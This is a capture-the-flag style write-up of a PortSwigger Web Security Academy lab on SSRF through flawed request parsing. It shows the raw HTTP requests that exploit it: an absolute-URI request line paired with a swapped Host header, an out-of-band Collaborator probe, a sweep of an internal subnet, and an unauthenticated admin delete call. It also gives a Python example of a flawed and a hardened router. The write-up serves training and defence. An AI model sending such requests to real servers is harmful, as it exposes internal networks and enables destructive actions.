| Field | Detail |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | HTTP Host Header Attacks / SSRF |
| Difficulty | Practitioner |
| Objective | Exploit flawed request parsing to reach an internal admin panel on 192.168.0.0/24 and delete the user carlos |
# SSRF via Flawed Request Parsing
Baseline GET / with the legitimate Host returned 200 OK.
Swapping Host to an arbitrary domain returned 403 Forbidden — the server validates the host header this time, unlike the previous routing-based SSRF lab.
The "flawed request parsing" means moving the legitimate domain into the request line as an absolute URI while placing our target in Host:
```http
GET 0a27007003c01041819acf0a00ec0093.web-security-academy.net HTTP/2
Host: teto.com
```
504 Gateway Timeout — the server timed out trying to connect to teto.com.
The parser reads the Host header for routing while the absolute-URI request line satisfies the domain validation check. The validator and the router are reading different parts of the request — that's the flaw. Confirming that it makes real outbound connections, with a Collaborator payload:
```http
GET 0a27007003c01041819acf0a00ec0093.web-security-academy.net HTTP/2
Host: gm64sulysttrnmcrqpatrs47yy4psgg5.oastify.com
```
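To make the validator/router split concrete, here is an added example (not from the lab or PortSwigger) that models the front end in HTTP/1.1 text form: `flawed_route` checks the request-line authority but routes on `Host`, while `hardened_route` derives one authority, rejects a request whose request-target and `Host` disagree, and validates that single value. `ALLOWED_HOSTS`, the helper names and the constructed requests are assumptions for illustration.

```python
from typing import Optional, Tuple, Dict
from urllib.parse import urlsplit

# Assumed allow-list: the only hostname the front end should ever route to.
ALLOWED_HOSTS = {"0a27007003c01041819acf0a00ec0093.web-security-academy.net"}


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request head into (method, request-target, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def authority_of(target: str) -> Optional[str]:
    """Hostname carried by the request line, or None for origin-form ("/path")."""
    if target.startswith("/"):
        return None
    if "://" not in target:
        target = "//" + target  # bare host in the request line, as in the lab's early probes
    return urlsplit(target).hostname


def flawed_route(raw: str) -> str:
    """Mimics the lab: validate the request-line authority, then route on Host."""
    _, target, headers = parse_request(raw)
    checked = authority_of(target) or headers.get("host")
    if checked not in ALLOWED_HOSTS:
        raise PermissionError("403 Forbidden")
    return headers["host"]  # the router trusts a field the validator never looked at


def hardened_route(raw: str) -> str:
    """Derive a single authority, require agreement with Host, validate that value."""
    _, target, headers = parse_request(raw)
    authority = authority_of(target)
    host = headers.get("host")
    if authority is not None and host is not None and authority != host.lower():
        raise ValueError("400 Bad Request: request-target and Host disagree")
    effective = authority or (host.lower() if host else None)
    if effective not in ALLOWED_HOSTS:
        raise PermissionError("403 Forbidden")
    return effective
```

Running the lab's `/admin` probe through both functions shows the flawed router returning `192.168.0.80` while the hardened one refuses the request before any connection is made.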
Collaborator received the request. I sent the request to Intruder and swept 192.168.0.1–255 with the position on the last octet, same setup as before with "Update Host header to match target" unchecked:
```http
GET 0a27007003c01041819acf0a00ec0093.web-security-academy.net HTTP/2
Host: 192.168.0.§x§
```
192.168.0.80 returned 404 Not Found — different from everything else in the sweep. A 404 from an internal host means we reached it; it just didn't find anything at /. That's the signal, not a miss.
Requesting /admin with the full absolute URI including https:// — dropping the scheme reverted to 404 behavior, so the scheme matters for correct routing here:
```http
GET https://0a27007003c01041819acf0a00ec0093.web-security-academy.net/admin HTTP/2
Host: 192.168.0.80
```
Admin panel loaded — no authentication wall. Extracting the CSRF token from the delete form and passing everything as query parameters:
```http
GET https://0a27007003c01041819acf0a00ec0093.web-security-academy.net/admin/delete?csrf=7uuUgfe8KruprG2wZEi2G7iNbNStM9fw&username=carlos HTTP/2
Host: 192.168.0.80
```
The lab is now solved.